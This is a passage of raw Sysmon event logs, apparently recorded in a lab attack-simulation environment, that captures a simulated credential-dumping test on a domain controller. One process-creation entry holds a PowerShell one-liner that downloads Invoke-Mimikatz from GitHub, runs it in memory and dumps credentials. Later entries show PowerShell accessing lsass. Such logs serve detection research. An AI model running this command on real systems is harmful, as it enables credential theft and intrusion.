22:53:21.486{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.486{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.485{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-7061-603D-5088-00000000AD01}6896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.485{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7061-603D-5088-00000000AD01}6896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001695446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.485{05ADC7E1-7061-603D-5088-00000000AD01}6896C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001695445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.484{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001695444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.483{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 354300x80000000000000001695443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.455{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55114-false10.0.1.12-8000- 23542300x80000000000000001695442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.460{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8368E09B1EF023A86430B2883700C2EB,SHA256=2CB40CBD6B38900B9BDEB69FB9AA1BC3100C05A0634A97EA9A69028A913261DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.226{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=115A2273AABDCC959123D84D89A0E6D6,SHA256=718FF45EDC3B1AAE5472E9186B410377A62EA7393DBB5819818EF89BCD2C3CED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.105{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B303F4692335CA8066932AE8BDACFB26,SHA256=05B2CA3D891035035F58D8A89BB880B591CA0734F91BBE42310E538D12C86087,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.533{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA1FC4D2EEAB8545A919C98EFB4AD0B6,SHA256=32E921F9B0BBB3AA9FE8B19D8FF5F3F6AE5A3B29AA14576E2AE0A7FD79DDD80B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.524{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=65B758A58BD53D6D19A1007ACF51894B,SHA256=EAC484021793034214E1869C01A5C09217C02D97F949C68F3F340465377C2C87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.522{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=137B43D0599D4B715EF845656594164D,SHA256=474388FBC4D521203E55459E9F39B745C771BD8234077E837CF8E7737DE0DB4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.522{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD890F9DB5F9DA15EAB5D8D1EAE52EF0,SHA256=0437793FDB39E5F2CDEBD1B86CB0096214967F8E74A87E8E8D2AD3459DE2262D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.233{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-7062-603D-5288-00000000AD01}6908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.233{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-7062-603D-5288-00000000AD01}6908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.192{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-7062-603D-5288-00000000AD01}6908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.192{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-7062-603D-5288-00000000AD01}6908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001695490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:53:22.176{05ADC7E1-7062-603D-5288-00000000AD01}6908\PSHost.132591128020934000.6908.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001695489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.161{05ADC7E1-7062-603D-5288-00000000AD01}6908ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_kz14djse.gxo.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.161{05ADC7E1-7062-603D-5288-00000000AD01}6908ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_c23hubf0.mqz.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.145{05ADC7E1-7062-603D-5288-00000000AD01}6908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_c23hubf0.mqz.ps12021-03-01 22:53:22.145 10341000x80000000000000001695486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.133{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-7062-603D-5288-00000000AD01}6908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.099{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7062-603D-5288-00000000AD01}6908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.096{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7062-603D-5288-00000000AD01}6908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001695483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.095{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.094{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.094{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.094{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.094{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-7062-603D-5288-00000000AD01}6908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.093{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7062-603D-5288-00000000AD01}6908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C: